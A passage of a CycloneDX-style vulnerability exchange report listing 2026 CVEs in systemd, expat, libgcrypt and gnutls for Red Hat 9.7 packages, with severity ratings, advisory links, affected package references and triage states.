      "description": "A flaw was found in systemd. The systemd-machined service contains an Improper Access Control vulnerability due to insufficient validation of the class parameter in the RegisterMachine D-Bus (Desktop Bus) method. A local unprivileged user can exploit this by attempting to register a machine with a specific class value, which may leave behind a usable, attacker-controlled machine object. This allows the attacker to invoke methods on the privileged object, leading to the execution of arbitrary commands with root privileges on the host system.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4105"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7299"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4105"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447262"
        },
        {
          "url": "https://github.com/systemd/systemd/security/advisories/GHSA-4h6x-r8vx-3862"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4105"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4105"
        }
      ],
      "published": "2026-03-13T19:55:13+00:00",
      "updated": "2026-04-30T17:16:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "252-55.el9_7.8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd-pam@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "252-55.el9_7.8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd-rpm-macros@252-55.el9_7.8?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "252-55.el9_7.8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "252-55.el9_7.8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/systemd-pam@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/systemd-rpm-macros@252-55.el9_7.8?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/systemd@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/systemd-pam@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/systemd-rpm-macros@252-55.el9_7.8?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/systemd@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/systemd-pam@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/systemd-rpm-macros@252-55.el9_7.8?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/systemd@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-41080",
      "ratings": [
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        331
      ],
      "description": "libexpat before 2.8.0 uses insufficient entropy, and thus hash flooding can occur via a crafted XML document.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-41080"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/26/1"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-41080"
        },
        {
          "url": "https://blog.hartwork.org/posts/expat-2-8-0-released/"
        },
        {
          "url": "https://github.com/libexpat/libexpat/issues/47"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1183"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41080"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-41080"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/26/1"
        }
      ],
      "published": "2026-04-16T17:16:54+00:00",
      "updated": "2026-04-27T07:16:03+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.5.0-5.el9_7.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-41989",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Libgcrypt before 1.12.2 sometimes allows a heap-based buffer overflow and denial of service via crafted ECDH ciphertext to gcry_pk_decrypt.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-41989"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-41989"
        },
        {
          "url": "https://dev.gnupg.org/T8211"
        },
        {
          "url": "https://lists.gnupg.org/pipermail/gnupg-announce/2026q2/000503.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41989"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-41989"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/21/1"
        }
      ],
      "published": "2026-04-23T05:16:05+00:00",
      "updated": "2026-04-27T18:33:18+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "1.10.0-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-41990",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Libgcrypt before 1.12.2 mishandles Dilithium signing. Writes to a static array lack a bounds check but do not use attacker-controlled data.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-41990"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-41990"
        },
        {
          "url": "https://dev.gnupg.org/T8208"
        },
        {
          "url": "https://lists.gnupg.org/pipermail/gnupg-announce/2026q2/000503.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41990"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-41990"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/21/1"
        }
      ],
      "published": "2026-04-23T05:16:05+00:00",
      "updated": "2026-04-27T18:33:27+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "1.10.0-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-42010",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N"
        }
      ],
      "cwes": [
        626
      ],
      "description": "A flaw was found in gnutls. Servers configured with RSA-PSK (Rivest\u2013Shamir\u2013Adleman \u2013 Pre-Shared Key) wrongfully matched usernames containing a NUL character with truncated usernames. A remote attacker could exploit this by sending a specially crafted username, leading to an authentication bypass. This vulnerability allows an attacker to gain unauthorized access by circumventing the authentication process.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42010"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42010"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467289"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42010"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42010"
        }
      ],
      "published": "2026-05-07T12:16:17+00:00",
      "updated": "2026-05-07T15:16:09+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.8.3-10.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-42011",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        295
      ],
      "description": "A flaw was found in gnutls. This vulnerability occurs because permitted name constraints were incorrectly ignored when previous Certificate Authorities (CAs) only had excluded name constraints. A remote attacker could exploit this to bypass critical name constraint checks during certificate validation. This bypass could lead to the acceptance of invalid certificates, potentially enabling spoofing or man-in-the-middle attacks against affected systems.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42011"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42011"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467437"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42011"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42011"
        }
      ],
      "published": "2026-05-07T15:16:09+00:00",
      "updated": "2026-05-07T15:48:55+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.8.3-10.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-4224",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        }
      ],
      "cwes": [
        674
      ],
      "description": "When an Expat parser with a registered ElementDeclHandler parses an inline\ndocument type definition containing a deeply nested content model a C stack\noverflow occurs.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4224"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/16/4"
        },
        {
